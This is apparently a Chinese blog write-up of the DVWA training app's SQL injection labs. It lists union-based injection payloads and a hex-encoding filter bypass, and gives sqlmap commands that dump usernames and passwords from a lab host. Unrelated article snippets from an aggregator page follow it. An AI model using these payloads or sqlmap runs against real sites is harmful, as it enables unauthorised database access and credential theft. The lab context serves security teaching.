锦州建设信息网站徐州建设企业网站

bicheng/2026/1/24 9:29:19/文章来源:
锦州建设信息网站,徐州建设企业网站,活动策划网站,爱妮微如何做网站链接的网址SQL Injection 就是通过把恶意的sql命令插入web表单递交给服务器#xff0c;或者输入域名或页面请求的查询字符串递交到服务器#xff0c;达到欺骗服务器#xff0c;让服务器执行这些恶意的sql命令#xff0c;从而让攻击者#xff0c;可以绕过一些机制#xff0c;达到直…SQL Injection 就是通过把恶意的sql命令插入web表单递交给服务器或者输入域名或页面请求的查询字符串递交到服务器达到欺骗服务器让服务器执行这些恶意的sql命令从而让攻击者可以绕过一些机制达到直接访问数据库的一种攻击手段。 SQL注入分类 数字型 字符型 报错注入 Boollean注入 时间注入SQL注入思路 (1).判断是否存在注入注入是字符型还是数字型(2).猜解SQL查询语句中的字段数 order by(3).确定回显位置 union select (4).获取当前数据库(5).获取数据库中的表(6).获取表中的字段名(7).得到数据SQL注入绕过方法 (1)注释符号绕过 (2)大小写绕过 (3)内联注释绕过(4)特殊编码绕过 (5)空格过滤绕过 (6)过滤or and xor not 绕过知识点 version() 数据库版本 database() 数据库名字 user() 数据库用户在mysql中存在一个自带的数据库information_schema他是一个存储记录所有数据库名表名列名的数据库通过查询他获取指定数据库下面的表名和列名信息 information_schema.table 记录所有表名信息的表 information_schema.column 记录所有列名信息的表 table_name 表名 columns_name 列名low级别 查看源码 1判断注入类型 输入1后结果如下 输入2后结果如下 输入1’后报错 猜出到是字符型注入我们继续输入1’ and ‘1’ 1 2判断字段数 order by 输入1’ order by 1# 输入1’ order by 2# 也没有报错 输入1’ order by 3#时报错了说明字段只有2列 **(3)判断回显位置 ** 1 union select 1,2#可以知道回显位置 在这二个地方 (4)判断数据库 1 union select 1,database()#(5)获取表名 1 union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase()#**(6)获取字段名 ** 1 union select 1,group_concat(column_name) from information_schema.columns where table_nameusers#(7)获取数据 1 union select user,password from users # medium级别 (1)判断注入类型 我们可以看到无法输入数字所以我们进行抓包在bp中进行SQL注入 输入id1’ and ‘1’1看见报错了 输入id1 and 11没有报错 所以注入类型为数字类型 (2)判断列数 所以列数为2列 3判断回显位置 回显位置为2 (4)判断数据库 5判断表名 1 union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase()#(6)判断列名 我们输入users之后发现没有如何反应 通过源代码我们可以知道发现它对单引号进行了转义我们采用16进制绕过得知users的十六进制为 0x75736572 1 union select 1,group_concat(column_name) from information_schema.columns where table_schema0x75736572#(7)获取数据 id1 union select user,password from users#high级别 1判断注入类型 输入1’ and ‘1’2’ 判定是字符型注入 (2)判断字段数 1’ order by 1# 1’ order by 2# 在输入 1’ order by 3# 时报错 3判断回显位置 1 union select 1,2#(4) 获取数据库 1 union select 1,database()#(5)获取表名 1 union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase()#(6)获取字段名 1 union select 1,group_concat(column_name) from information_schema.columns where table_nameusers#(7)获取数据 1 union select user,password from users#报错解决 sql注入联合查询时返回报错信息 “Illegal mix of collations for operation ‘UNION’ ” 出现这个问题的原因是因为union字符规则不一致导致 解决 进入数据库管理后台 SQL Injection(Blind) sqlmap是一个自动化的SQL注入工具其主要功能是扫描发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等。 Sqlmap采用了以下5种独特的SQL注入技术 1、基于布尔类型的盲注即可以根据返回页面判断条件真假的注入 2、基于时间的盲注即不能根据页面返回的内容判断任何信息要用条件语句查看时间延迟语句是否已经执行(即页面返回时间是否增加)来判断 3、基于报错注入即页面会返回错误信息或者把注入的语句的结果直接返回到页面中 4、联合查询注入在可以使用Union的情况下注入 5、堆查询注入可以同时执行多条语句时的注入Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统并在获取完全的操作权限时执行任意命令。 sqlmap是一个跨平台的工具很好用是SQL注入方面一个强大的工具 基本步骤 查看sqlmap相关参数以及用法命令格式为sqlmap -h找到一个可利用的网址判断网站数据库类型命令格式为sqlmap -u确定数据库类型为mysql后查看存在的数据库命令格式为sqlmap -u 目标网址–dbs查看数据库中存在的表命令格式为sqlmap -u 目标网址–tables -D 数据库名获取表中的字段命令格式为sqlmap -u 目标网址– columns -T 表名 -D 数据库名猜解出字段查看表里的存储内容命令格式为sqlmap -u 目标网址– dump -C 字段名称 -T 表名 -D 数据库名sqlmap需要我们输入参数其中最重要的参数是SQL注入的目标地址。首先要判断测试的目标地址是否需要登录如果需要登录则将登陆的Cookie作为参数传递给sqlmap。python sqlmap.py -u “目标地址” --cookie“cookie值” --batch–batch用来指明自动化操作否则每一个步骤都需要确认 –current-bd查看当前数据库名称 -D DB 指定要枚举的 DBMS 数据库 -T TBL 指定要枚举的 DBMS 数据表 -C COL 指定要枚举的 DBMS 数据列 -X EXCLUDECOL 指定要排除的 DBMS 数据列 -U USER 指定枚举的 DBMS 用户LOW级别 浏览器抓包 也可以用bp截取cookie信息 sqlmap -u http://192.168.80.145/dvwa/vulnerabilities/sqli_blind?id1SubmitSubmit --cookiesecuritylow; PHPSESSID8fkivqb2c1oaqmugqcka4mkgma开始暴库 sqlmap -u http://192.168.80.145/dvwa/vulnerabilities/sqli_blind?id1SubmitSubmit --cookiesecuritylow; PHPSESSID14e25onisogeuh3n3mlfkegd9s --dbs --batch暴表名 sqlmap -u http://192.168.80.145/dvwa/vulnerabilities/sqli_blind?id1SubmitSubmit --cookiesecuritylow; PHPSESSID14e25onisogeuh3n3mlfkegd9s -D dvwa --tables --batch# -D 要爆破的数据库名 # --tables 暴表名暴字段 sqlmap -u http://192.168.80.145/dvwa/vulnerabilities/sqli_blind?id1SubmitSubmit --cookiesecuritylow; PHPSESSID8fkivqb2c1oaqmugqcka4mkgma -D dvwa -T users --columns --batch# -D 要爆破的数据库名 # -T 要爆破的表名 # --columns 暴字段名获取用户和密码 sqlmap -u http://192.168.80.145/dvwa/vulnerabilities/sqli_blind?id1SubmitSubmit --cookiesecuritylow; PHPSESSID14e25onisogeuh3n3mlfkegd9s -D dvwa -T users -C user,password --dump # -C user,password 要爆破的字段 # --dump 导出数据库 Medium级别 bp抓包发现是post请求携带参数提交的数据需要使用 --data 参数把数据引入过来 爆破数据库 sqlmap http://192.168.80.145/dvwa/vulnerabilities/sqli_blind/# --cookie securitymedium; PHPSESSIDejqjhrcjdf2em40du4bru9l96n --data id1SubmitSubmit --dbs --batch爆破数据库的表 sqlmap http://192.168.80.145/dvwa/vulnerabilities/sqli_blind/# --cookie securitymedium; PHPSESSIDejqjhrcjdf2em40du4bru9l96n --data id1SubmitSubmit -D dvwa --tables --batch 爆破表的字段 sqlmap http://192.168.80.145/dvwa/vulnerabilities/sqli_blind/# --cookie securitymedium; PHPSESSIDejqjhrcjdf2em40du4bru9l96n --data id1SubmitSubmit -D dvwa -T users --columns --batch 获取用户和密码 sqlmap http://192.168.80.145/dvwa/vulnerabilities/sqli_blind/# --cookie securitymedium; PHPSESSIDejqjhrcjdf2em40du4bru9l96n --data id1SubmitSubmit -D dvwa -T users -C user,password --dump

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/87246.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

企业门户网站建设渠道网站积分商城该怎么建立

创建型模式,共五种:工厂方法模式、抽象工厂模式、单例模式、建造者模式、原型模式。 1.工厂方法模式:(常用,需要掌握) 定义:定义了一个创建对象的抽象方法,由子类决定要实例化的类。…

被墙域名黑别人网站vue做门户网站用什么ui

一、Spring Boot简介与背景 在当前的Java应用程序开发领域,Spring Boot 已经成为了一种非常受欢迎的选择。Spring Boot是Spring Framework的一种扩展,旨在简化基于Spring的应用程序的开发和部署过程。它的出现填补了许多传统Spring开发中的空白&#xf…

国内p2p网站建设周末做兼职上什么网站找

U盘是我们生活和工作中最常用的移动储存设备,经常被用来存放各种重要数据,为了保证数据的安全,我们需要加密U盘。那么,U盘加密方法有哪些呢? U盘加密普通方法 如果你的U盘储存数据不多,并且对于加密的要求…

建设银行网站每天几点更新重庆怎么站seo

什么是动态规划 对于动态规划问题,我将拆解为如下五步曲,这五步都搞清楚了,才能说把动态规划真的掌握了! 确定dp数组(dp table)以及下标的含义确定递推公式dp数组如何初始化确定遍历顺序举例推导dp数组&a…

陵水网站建设价格富阳网站设计

文章目录 Linux学习笔记操作系统Linux初识Linux的诞生Linux内核Linux发行版 虚拟机VMware安装远程连接Linux系统FinalShellFinalShell连接Linux WSL配置UbuntuLinux常用命令1.入门2.ls命令cd命令3.pwd命令4.相对路径和绝对路径5.mkdir命令6.文件操作命令(1&#xff…

个人免费网站建设wordpress 数码主题

进程管理 基本概念进程控制进程上下文切换 线程进程和线程的比较进程通信管道消息队列共享内存信号量信号socket 基本概念 进程:一个具有一定独立功能的程序关于某个数据集合的一次运行活动。它是操作系统动态执行的基本单元.并行和并发:状态: 其中挂起是指没有给程序分配实际…

黄埔移动网站建设网站设网站设计

本文重点 梯度下降算法和正规方程是两种常用的机器学习算法,用于求解线性回归问题。它们各自有一些优点和缺点,下面将分别对它们进行详细的讨论。 区别 1. 梯度下降算法是一种迭代的优化算法,通过不断迭代调整参数来逼近最优解。它的基本思想是根据目标函数的梯度方向,沿…

学习网站后台维护网站开发过程阶段

作者推荐 视频算法专题 本文涉及知识点 数学 回溯 字符串 性能优化 LeetCode1307. 口算难题 给你一个方程,左边用 words 表示,右边用 result 表示。 你需要根据以下规则检查方程是否可解: 每个字符都会被解码成一位数字(0 - …

郑州优化网站收费标准wordpress 超酷主题

点此进入官网,专家1对1:应用身份管理服务OneAccess_华为云IDaaS-华为云

网站横幅代码网站制作属于什么专业

文章目录 力扣题目工程代码C实现python实现 力扣题目 给你一个长度为 n 下标从 0 开始的字符串 blocks ,blocks[i] 要么是 ‘W’ 要么是 ‘B’ ,表示第 i 块的颜色。字符 ‘W’ 和 ‘B’ 分别表示白色和黑色。 给你一个整数 k ,表示想要 连…

靖江建设行业协会网站淘客优惠券推广网站怎么做

实时时钟RTC是一个独立的定时器。RTC模块拥有一个连续计数的计数器,在软件配置下,可以提供时钟日历的功能。修改计数器的值可以重新设置当前时间和日期 RTC还包含用于管理低功耗模式的自动唤醒单元。 在掉电情况下 RTC仍可以独立运行 只要芯片的备用电源…

网站的后台怎么做app营销策略有哪些

横、纵表 定义 横表定义:一个对象的所有属性在一行,列的定义是对象的各个字段 举例:学生成绩表 姓名 Java C语言 ​ 张三 100 88 纵表定义:一个对象的所有属性被分配到多行,列的定义是对象的字段和字段的值 举例…

视频广告联盟平台排名优化工具下载

一、事件与处理 程序在运算过程中发生的一些事情:鼠标单击、键盘的按下... 这些的事件的监控与处理在Qt中不是以信号的方式处理的。 当这些事件发生时会调用QObject类中的功能函数(虚函数),所有的控件类都继承了这个类。 常用的鼠…

铜川做网站的公司上海装修公司排名前20

目录 一.概述 二 .漏洞影响 三.漏洞复现 1. 漏洞一: 四.修复建议: 五. 搜索语法: 六.免责声明 一.概述 网康下一代防火墙(NGFW)是一款可以全面应对应用层威胁的高性能防火墙。通过深入洞察网络流量中的用户、应用和内容,并…

淘宝网客网站建设网站开发和软件开发

今天学习Makefile预定义变量的使用,加qq:1126137994.微信:liu1126137994一起学习更多技术!!! 1.预定义变量:自动变量 在Makefile中存在一些预定义过的变量,我们可以直接拿来使用而…

平面网站设计网站备案域名更改

手搓反激电源 | 五、反激高频变压器的设计与计算 先上干货,变压器设计规格书 千里之行,积于跬步,万里之船,成于罗盘 A journey of thousands of miles accumulates in steps, and the ship of thousands of miles becomes a compass 反激式变换操作 反激式变换器的…

酷炫网站首页WordPress里h1跟p有什么

大家有没有想过这个问题:软件测试中有哪些误区呢?想起这个题目,是因为最近遇到好几次关于这方面的讨论。发觉即便做过几年测试的老员工也或多或少有些这方面的困惑。当然一家之言,仅作抛砖引玉之谈。 误区一:测试就是…

学做网站论坛 可以吗个人网站开发赚钱方向

​2023年12月13日,北京玻色量子科技有限公司(以下简称“玻色量子”)联合上海交通大学在中科院分区1区、计算化学领域Top刊物JCTC(Journal of Chemical Theory and Computation)内刊的封面上发表了以“Encoding Molecul…

妇联加强网站平台建设高端网站改版顾问

目录 一、面向过程和面向对象初步认识 二、类的引入和定义 2.1类的引入 2.2类的定义 三、类的访问限定符及封装 3.1访问限定符 3.2封装 四、类的作用域 五、类的实例化 六、类的对象大小的计算 6.1如何计算对象的大小 6.2类对象的存储方式 七、类成员函数的thi…

正规的丹阳网站建设邯郸市中小学健康管理平台登录

解析 绿题照样不会qwq 一开始的想法是按位分类讨论 辛辛苦苦码了七十行 然后发现当一次性需要进多位的时候就炸了 qwq 关键要考虑到一点:异或就是不进位的加法 所以考虑u和v的差值,设为d 将其二进制分解,然后就是让其在对应的位进位即可 后…